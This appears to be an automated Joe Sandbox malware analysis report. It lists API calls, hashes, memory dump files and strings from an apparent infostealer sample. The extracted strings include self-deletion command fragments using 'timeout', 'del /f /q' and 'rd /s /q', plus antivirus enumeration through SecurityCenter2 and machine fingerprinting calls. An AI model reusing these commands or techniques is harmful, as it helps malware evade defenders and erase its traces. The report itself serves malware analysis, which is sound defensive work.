                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                    • API String ID: 4288110179-315474579
                                                                                                                                                                                                                                                    • Opcode ID: 1092da1d12c18ecd17c52f71949933ca229d8a6a2ca64138b6c3e9c57fd7b4f3
                                                                                                                                                                                                                                                    • Instruction ID: c5315d6b5155e25a15335010d90685e81d930369a3ca5b44ee1980fcf2dda42d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1092da1d12c18ecd17c52f71949933ca229d8a6a2ca64138b6c3e9c57fd7b4f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D318A70A44246BBDF20DBD1CC49EEFBBBCEFC5B10F104619F611AA1A0C6759940DB20
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000812A7
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000812B6
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BA9EC), ref: 000812D0
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BA9F0), ref: 000812DE
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BA9F4), ref: 000812EC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BA9F8), ref: 000812FA
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BA9FC), ref: 00081308
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA00), ref: 00081316
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA04), ref: 00081324
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA08), ref: 00081332
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA0C), ref: 00081340
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA10), ref: 0008134E
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA14), ref: 0008135C
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA18), ref: 0008136A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000BAA1C), ref: 00081378
                                                                                                                                                                                                                                                      • Part of subcall function 00090C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00081385), ref: 00090C91
                                                                                                                                                                                                                                                      • Part of subcall function 00090C85: HeapAlloc.KERNEL32(00000000,?,?,?,00081385), ref: 00090C98
                                                                                                                                                                                                                                                      • Part of subcall function 00090C85: GetComputerNameA.KERNEL32(00000000,00081385), ref: 00090CAC
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 000813E3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1553874529-0
                                                                                                                                                                                                                                                    • Opcode ID: b3a23cdda15bb0bb534096dba69d6c20efbc948b5ce45ef18b209516705a9f0e
                                                                                                                                                                                                                                                    • Instruction ID: 872bed57fa9882648ce2ae313de5489de0f49cf36cf8e585f6933e38993d45eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3a23cdda15bb0bb534096dba69d6c20efbc948b5ce45ef18b209516705a9f0e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C84184B1E0422C67CB20EBB08C59FDB7BAC9F16350F500691E5D9E7041E774AB89CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,000B670F,00000000,?,?), ref: 00091273
                                                                                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000912B0
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 000912DD
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000912FC
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00091332
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00091347
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,000B6E8C), ref: 000913DC
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00091446
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00091466
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00091472
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                                                    • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                    • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                                                    • Opcode ID: fc594f72ce0b8bf950f4da0e05dab2f352694d5d651c8b0e393f8db9a1886b0a
                                                                                                                                                                                                                                                    • Instruction ID: d1a6453f9124970217b03ab9df4034b956274e838a0134e4259f3ad460b6b482
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc594f72ce0b8bf950f4da0e05dab2f352694d5d651c8b0e393f8db9a1886b0a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9761B67590012C9BEF21EB14ED84EDEB7B8EB45304F5142E6E608A7162DF30AE89DF50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00098296
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000982A5
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 000982BA
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • ShellExecuteEx.SHELL32(?), ref: 00098456
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00098465
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00098477
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00098487
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • /c timeout /t 10 & del /f /q ", xrefs: 000982E5
                                                                                                                                                                                                                                                    • " & rd /s /q "C:\ProgramData\, xrefs: 00098333
                                                                                                                                                                                                                                                    • " & exit, xrefs: 00098389
                                                                                                                                                                                                                                                    • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00098390
                                                                                                                                                                                                                                                    • " & exit, xrefs: 000983DA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                                                    • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                                                    • API String ID: 2823247455-1079830800
                                                                                                                                                                                                                                                    • Opcode ID: 3744da5eb74f0945d44c55bbfa767333e5f40574cf17d46d23e6e8d972d57b2e
                                                                                                                                                                                                                                                    • Instruction ID: c7587d0c25b3082506d82e46f9ce15766a5ed106e358b40a62f57710e3887665
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3744da5eb74f0945d44c55bbfa767333e5f40574cf17d46d23e6e8d972d57b2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 285172B1D4022A9BCF61AF64CC86ADDB3BCAB44704F4201E5A758B7152DB306F869F54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000909D5
                                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00090A15
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00090A6A
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00090A71
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00090AA7
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B6E3C), ref: 00090AB6
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0009169F
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: _memset.LIBCMT ref: 000916CE
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000916F6
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: lstrcatA.KERNEL32(?,000B6ECC,?,?,?,?,?), ref: 00091713
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00090ACD
                                                                                                                                                                                                                                                      • Part of subcall function 000923D5: malloc.MSVCRT ref: 000923DA
                                                                                                                                                                                                                                                      • Part of subcall function 000923D5: strncpy.MSVCRT ref: 000923EB
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00090AF0
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                    • String ID: w$:\$C$QuBi
                                                                                                                                                                                                                                                    • API String ID: 1856320939-962629224
                                                                                                                                                                                                                                                    • Opcode ID: 311d12c63b143cd33ec546965bf560b7d47d55d9d40d29794bf87000aa13b0f9
                                                                                                                                                                                                                                                    • Instruction ID: 7fae983a3f0329fa1dcd1d4c0bc525356302d267ab5f4d8de2da66efbddbc90e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 311d12c63b143cd33ec546965bf560b7d47d55d9d40d29794bf87000aa13b0f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54418E71905228ABCF25AF74AC89ADEBBB8EF19344F0100E6F149E7121D6708F958F51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000869C5
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: StrCmpCA.SHLWAPI(?), ref: 000869DF
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086A0E
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00086A4D
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086A7D
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00086A88
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00086AAC
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0009691A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00096925
                                                                                                                                                                                                                                                      • Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?), ref: 0009693A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00096949
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00096962
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
